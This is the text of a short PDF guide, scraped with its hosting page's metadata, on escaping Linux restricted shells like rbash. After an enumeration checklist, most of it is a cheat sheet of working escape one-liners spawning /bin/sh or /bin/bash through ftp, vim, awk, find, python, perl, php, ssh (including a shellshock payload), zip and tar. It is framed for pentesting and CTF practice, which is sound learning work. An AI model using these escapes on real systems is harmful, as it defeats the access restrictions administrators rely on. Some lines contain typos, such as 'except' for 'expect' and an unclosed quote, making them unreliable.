44592 Linux Restricted Shell Bypass Guide

44592-linux-restricted-shell-bypass-guide

44592-linux-restricted-shell-bypass-guide

44592-linux-restricted-shell-bypass-guide

44592-linux-restricted-shell-bypass-guide

44592-linux-restricted-shell-bypass-guide

User Manual: Pdf

Open the PDF directly: View PDF PDF.
Page Count: 8

Download44592-linux-restricted-shell-bypass-guide
Open PDF In BrowserView PDF
Linux Restricted Shell Bypass
By @n4ckhcker & @h4d3sw0rm

Contents
[ 1 ] Introduction
[ 2 ] Enumeration Linux Environment
[ 3 ] Common Exploitation Techniques
[ 4 ] Programming Languages Techniques
[ 5 ] Advanced Techniques
[ 6 ] Time to Practice

Introduction
Hello, so first of all let’s explain what is a restricted shell ? A restricted shell is a shell
that block/restricts some of the commands like cd,ls,echo etc or
"block" the environment variables like SHELL,PATH,USER. Sometimes a restricted shell
can block the commands with / or the redirecting outputs like >,>>. The types of a
restricted shell can be : rbash,rksh,rsh. But now why someone want to create a
restricted shell ? Let’s say some examples :
1)To improve Security
2)To block hackers/pentesters.
3)Sometimes system administrators create a restricted shell to protect theirselves from
dangerous commands.
4)For a CTF Challenge. (Root-me/hackthebox/vulnhub).

Enumeration Linux Environment
Enumeration is the most important part. We need to enumeration the
Linux environmental to check what we can do to bypass the rbash.
We need to enumerate :
1) First we must to check for available commands like cd/ls/echo etc.
2) We must to check for operators like >,>>,<,|.
3) We need to check for available programming languages like
perl,ruby,python etc.
4) Which commands we can run as root (sudo -l).
5) Check for files or commands with SUID perm.
6) You must to check in what shell you are : echo $SHELL you will be in
rbash by 90%
7) Check for the Environmental Variables : run env or printenv
Now let’s move into Common Exploitation Techniques.

Common Exploitation Techniques
Now let’s see some of the common exploitation techniques.
1) If "/" is allowed you can run /bin/sh or /bin/bash.
2) If you can run cp command you can copy the /bin/sh or /bin/bash
into your directory.
3) From ftp > !/bin/sh or !/bin/bash
4) From gdb > !/bin/sh or !/bin/bash
5) From more/man/less > !/bin/sh or !/bin/bash
6) From vim > !/bin/sh or !/bin/bash
7) From rvim > :python import os; os.system("/bin/bash )
8) From scp > scp -S /path/yourscript x y:
9) From awk > awk 'BEGIN {system("/bin/sh or /bin/bash")}'
10)
From find > find / -name test -exec /bin/sh or /bin/bash \;

Programming Languages Techniques
Now.. let’s look some programming languages techniques.
1) From except > except spawn sh then sh.
2) From python > python -c 'import os; os.system("/bin/sh")'
3) From php > php -a then exec("sh -i");
4) From perl > perl -e 'exec "/bin/sh";'
5) From lua > os.execute('/bin/sh').
6) From ruby > exec "/bin/sh"
Now let’s move into Advance Techniques.

Advanced Techniques
Now let's move into some dirty advance techniques.
1)From ssh > ssh username@IP - t "/bin/sh" or "/bin/bash"
2)From ssh2 > ssh username@IP -t "bash --noprofile"
3)From ssh3 > ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
4)From ssh4 > ssh -o ProxyCommand="sh -c /tmp/yourfile.sh"
127.0.0.1 (SUID)
5)From git > git help status > you can run it then !/bin/bash
6)From pico > pico -s "/bin/bash" then you can write /bin/bash and
then CTRL + T
7)From zip > zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c
/bin/bash"
8)From tar > tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash
C SETUID SHELL :

Time For Practise
Root-me have a INSANE rbash bypass challenge!
https://www.root-me.org/en/Challenges/App-Script/Restricted-shells

Hackthebox solidstate machine! (Easy)
https://www.hackthebox.eu/



Source Exif Data:
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.7
Linearized                      : No
Page Count                      : 8
Language                        : en-US
Tagged PDF                      : Yes
XMP Toolkit                     : 3.1-701
Producer                        : Microsoft® Word 2016
Creator Tool                    : Microsoft® Word 2016
Create Date                     : 2018:05:04 19:31:18+00:00
Modify Date                     : 2018:05:04 19:31:18+00:00
Document ID                     : uuid:4AE97E2E-CB25-4CA0-8C26-C9902CC9BDF3
Instance ID                     : uuid:4AE97E2E-CB25-4CA0-8C26-C9902CC9BDF3
Creator                         : Microsoft® Word 2016
EXIF Metadata provided by EXIF.tools

Navigation menu